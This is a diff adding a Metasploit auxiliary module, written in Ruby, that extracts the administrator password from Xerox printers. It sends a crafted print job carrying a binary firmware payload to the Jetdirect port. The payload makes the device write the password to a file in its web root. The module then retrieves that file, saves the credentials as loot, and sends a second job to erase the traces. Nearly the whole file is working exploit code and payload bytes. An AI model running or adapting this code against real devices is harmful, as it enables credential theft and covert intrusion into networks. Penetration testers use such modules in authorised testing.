|
| 1 | +# |
| 2 | +# This module requires Metasploit: http://metasploit.com/download |
| 3 | +# Current source: https://github.com/rapid7/metasploit-framework |
| 4 | +## |
| 5 | + |
| 6 | +require 'msf/core' |
| 7 | + |
| 8 | +class Metasploit3 < Msf::Auxiliary |
| 9 | + |
| 10 | + include Msf::Exploit::Remote::Tcp |
| 11 | + include Msf::Auxiliary::Report |
| 12 | + |
| 13 | + def initialize(info={}) |
| 14 | + super(update_info(info, |
| 15 | + 'Name' => 'Xerox Administrator Console Password Extract', |
| 16 | + 'Description' => %{ |
| 17 | + This module will extract the management consoles admin password from the Xerox file system |
| 18 | + using firmware bootstrap injection. |
| 19 | + }, |
| 20 | + 'Author' => |
| 21 | + [ |
| 22 | + 'Deral "Percentx" Heiland', |
| 23 | + 'Pete "Bokojan" Arzamendi' |
| 24 | + ], |
| 25 | + 'License' => MSF_LICENSE |
| 26 | + )) |
| 27 | + |
| 28 | + register_options( |
| 29 | + [ |
| 30 | + OptPort.new('RPORT', [true, 'Web management console port for the printer', 80]), |
| 31 | + OptPort.new('JPORT', [true, 'Jetdirect port', 9100]), |
| 32 | + OptInt.new('TIMEOUT', [true, 'Timeout to wait for printer job to run', 45]) |
| 33 | + ], self.class) |
| 34 | + end |
| 35 | + |
| 36 | + def jport |
| 37 | + datastore['JPORT'] |
| 38 | + end |
| 39 | + |
| 40 | + # Time to start the fun |
| 41 | + def run |
| 42 | + print_status("#{rhost}:#{jport} - Attempting to extract the web consoles admin password...") |
| 43 | + return unless write |
| 44 | + |
| 45 | + print_status("#{rhost}:#{jport} - Waiting #{datastore['TIMEOUT']} seconds...") |
| 46 | + sleep(datastore['TIMEOUT']) |
| 47 | + passwd = retrieve |
| 48 | + remove |
| 49 | + |
| 50 | + if passwd |
| 51 | + print_good("#{rhost}:#{jport} - Password found: #{passwd}") |
| 52 | + |
| 53 | + loot_name = 'xerox.password' |
| 54 | + loot_type = 'text/plain' |
| 55 | + loot_filename = 'xerox_password.text' |
| 56 | + loot_desc = 'Xerox password harvester' |
| 57 | + p = store_loot(loot_name, loot_type, datastore['RHOST'], passwd, loot_filename, loot_desc) |
| 58 | + print_status("#{rhost}:#{jport} - Credentials saved in: #{p}") |
| 59 | + |
| 60 | + register_creds('Xerox-HTTP', rhost, rport, 'Admin', passwd) |
| 61 | + |
| 62 | + else |
| 63 | + print_error("#{rhost}:#{jport} - No credentials extracted") |
| 64 | + end |
| 65 | + end |
| 66 | + |
| 67 | + #Trigger firmware bootstrap write out password data to URL root |
| 68 | + def write |
| 69 | + print_status("#{rhost}:#{jport} - Sending print job") |
| 70 | + create_print_job = '%%XRXbegin' + "\x0a" |
| 71 | + create_print_job << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0a" |
| 72 | + create_print_job << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0a" |
| 73 | + create_print_job << '%%OID_ATT_JOB_COMMENT ""' + "\x0a" |
| 74 | + create_print_job << '%%OID_ATT_JOB_COMMENT "patch"' + "\x0a" |
| 75 | + create_print_job << '%%OID_ATT_DLM_NAME "xerox"' + "\x0a" |
| 76 | + create_print_job << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "\x0a" |
| 77 | + create_print_job << '%%OID_ATT_DLM_SIGNATURE "8ba01980993f55f5836bcc6775e9da90bc064e608bf878eab4d2f45dc2efca09"' + "\x0a" |
| 78 | + create_print_job << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' + "\x0a" |
| 79 | + create_print_job << '%%XRXend' + "\x0a\x1f\x8b" |
| 80 | + create_print_job << "\x08\x00\x80\xc3\xf6\x51\x00\x03\xed\xcf\x3b\x6e\xc3\x30\x0c\x06" |
| 81 | + create_print_job << "\x60\xcf\x39\x05\xe3\xce\x31\x25\xa7\x8e\xa7\x06\xe8\x0d\x72\x05" |
| 82 | + create_print_job << "\x45\x92\x1f\x43\x2d\x43\x94\x1b\x07\xc8\xe1\xab\x16\x28\xd0\xa9" |
| 83 | + create_print_job << "\x9d\x82\x22\xc0\xff\x0d\x24\x41\x72\x20\x57\x1f\xc3\x5a\xc9\x50" |
| 84 | + create_print_job << "\xdc\x91\xca\xda\xb6\xf9\xcc\xba\x6d\xd4\xcf\xfc\xa5\x56\xaa\xd0" |
| 85 | + create_print_job << "\x75\x6e\x35\xcf\xba\xd9\xe7\xbe\xd6\x07\xb5\x2f\x48\xdd\xf3\xa8" |
| 86 | + create_print_job << "\x6f\x8b\x24\x13\x89\x8a\xd9\x47\xbb\xfe\xb2\xf7\xd7\xfc\x41\x3d" |
| 87 | + create_print_job << "\x6d\xf9\x3c\x4e\x7c\x36\x32\x6c\xac\x49\xc4\xef\x26\x72\x98\x13" |
| 88 | + create_print_job << "\x4f\x96\x6d\x98\xba\xb1\x67\xf1\x76\x89\x63\xba\x56\xb6\xeb\xe9" |
| 89 | + create_print_job << "\xd6\x47\x3f\x53\x29\x57\x79\x75\x6f\xe3\x74\x32\x22\x97\x10\x1d" |
| 90 | + create_print_job << "\xbd\x94\x74\xb3\x4b\xa2\x9d\x2b\x73\xb9\xeb\x6a\x3a\x1e\x89\x17" |
| 91 | + create_print_job << "\x89\x2c\x83\x89\x9e\x87\x94\x66\x97\xa3\x0b\x56\xf8\x14\x8d\x77" |
| 92 | + create_print_job << "\xa6\x4a\x6b\xda\xfc\xf7\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00" |
| 93 | + create_print_job << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8f\xea\x03\x34\x66\x0b\xc1" |
| 94 | + create_print_job << "\x00\x28\x00\x00" |
| 95 | + |
| 96 | + begin |
| 97 | + connect(true, 'RPORT' => jport) |
| 98 | + sock.put(create_print_job) |
| 99 | + rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse |
| 100 | + print_error("#{rhost}:#{jport} - Error connecting to #{rhost}") |
| 101 | + ensure |
| 102 | + disconnect |
| 103 | + end |
| 104 | + end |
| 105 | + |
| 106 | + def retrieve |
| 107 | + print_status("#{rhost}:#{jport} - Retrieving password from #{rhost}") |
| 108 | + request = "GET /Praeda.txt HTTP/1.0\r\n\r\n" |
| 109 | + |
| 110 | + begin |
| 111 | + connect |
| 112 | + sock.put(request) |
| 113 | + res = sock.get_once || '' |
| 114 | + passwd = res.match(/\r\n\s(.+?)\n/) |
| 115 | + return passwd ? passwd[1] : '' |
| 116 | + rescue ::EOFError, ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse, EOFError |
| 117 | + print_error("#{rhost}:#{jport} - Error getting password from #{rhost}") |
| 118 | + return |
| 119 | + ensure |
| 120 | + disconnect |
| 121 | + end |
| 122 | + end |
| 123 | + |
| 124 | + # Trigger firmware bootstrap to delete the trace files and praeda.txt file from URL |
| 125 | + def remove |
| 126 | + print_status("#{rhost}:#{jport} - Removing print job") |
| 127 | + remove_print_job = '%%XRXbegin' + "\x0A" |
| 128 | + remove_print_job << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0A" |
| 129 | + remove_print_job << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0A" |
| 130 | + remove_print_job << '%%OID_ATT_JOB_COMMENT ""' + "\x0A" |
| 131 | + remove_print_job << '%%OID_ATT_JOB_COMMENT "patch"' + "\x0A" |
| 132 | + remove_print_job << '%%OID_ATT_DLM_NAME "xerox"' + "\x0A" |
| 133 | + remove_print_job << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "\x0A" |
| 134 | + remove_print_job << '%%OID_ATT_DLM_SIGNATURE "8b5d8c631ec21068211840697e332fbf719e6113bbcd8733c2fe9653b3d15491"' + "\x0A" |
| 135 | + remove_print_job << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' + "\x0A" |
| 136 | + remove_print_job << '%%XRXend' + "\x0a\x1f\x8b" |
| 137 | + remove_print_job << "\x08\x00\x5d\xc5\xf6\x51\x00\x03\xed\xd2\xcd\x0a\xc2\x30\x0c\xc0" |
| 138 | + remove_print_job << "\xf1\x9e\x7d\x8a\x89\x77\xd3\x6e\xd6\xbd\x86\xaf\x50\xb7\xc1\x04" |
| 139 | + remove_print_job << "\xf7\x41\xdb\x41\x1f\xdf\x6d\x22\x78\xd2\x93\x88\xf8\xff\x41\x92" |
| 140 | + remove_print_job << "\x43\x72\x48\x20\xa9\xf1\x43\xda\x87\x56\x7d\x90\x9e\x95\xa5\x5d" |
| 141 | + remove_print_job << "\xaa\x29\xad\x7e\xae\x2b\x93\x1b\x35\x47\x69\xed\x21\x2f\x0a\xa3" |
| 142 | + remove_print_job << "\xb4\x31\x47\x6d\x55\xa6\x3f\xb9\xd4\xc3\x14\xa2\xf3\x59\xa6\xc6" |
| 143 | + remove_print_job << "\xc6\x57\xe9\xc5\xdc\xbb\xfe\x8f\xda\x6d\xe5\x7c\xe9\xe5\xec\x42" |
| 144 | + remove_print_job << "\xbb\xf1\x5d\x26\x53\xf0\x12\x5a\xe7\x1b\x69\x63\x1c\xeb\x39\xd7" |
| 145 | + remove_print_job << "\x43\x15\xe4\xe4\x5d\x53\xbb\x7d\x4c\x71\x9d\x1a\xc6\x28\x7d\x25" |
| 146 | + remove_print_job << "\xf5\xb5\x0b\x92\x96\x0f\xba\xe7\xf9\x8f\x36\xdf\x3e\x08\x00\x00" |
| 147 | + remove_print_job << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xc4\x0d\x40\x0a" |
| 148 | + remove_print_job << "\x75\xe1\x00\x28\x00\x00" |
| 149 | + |
| 150 | + begin |
| 151 | + connect(true, 'RPORT' => jport) |
| 152 | + sock.put(remove_print_job) |
| 153 | + rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse |
| 154 | + print_error("#{rhost}:#{jport} - Error removing print job from #{rhost}") |
| 155 | + ensure |
| 156 | + disconnect |
| 157 | + end |
| 158 | + end |
| 159 | + |
| 160 | + def register_creds(service_name, remote_host, remote_port, username, password) |
| 161 | + credential_data = { |
| 162 | + origin_type: :service, |
| 163 | + module_fullname: self.fullname, |
| 164 | + workspace_id: myworkspace.id, |
| 165 | + private_data: password, |
| 166 | + private_type: :password, |
| 167 | + username: username |
| 168 | + } |
| 169 | + |
| 170 | + service_data = { |
| 171 | + address: remote_host, |
| 172 | + port: remote_port, |
| 173 | + service_name: service_name, |
| 174 | + protocol: 'tcp', |
| 175 | + workspace_id: myworkspace_id |
| 176 | + } |
| 177 | + |
| 178 | + credential_data.merge!(service_data) |
| 179 | + credential_core = create_credential(credential_data) |
| 180 | + |
| 181 | + login_data = { |
| 182 | + core: credential_core, |
| 183 | + status: Metasploit::Model::Login::Status::UNTRIED, |
| 184 | + workspace_id: myworkspace_id |
| 185 | + } |
| 186 | + |
| 187 | + login_data.merge!(service_data) |
| 188 | + create_credential_login(login_data) |
| 189 | + end |
| 190 | +end |
0 commit comments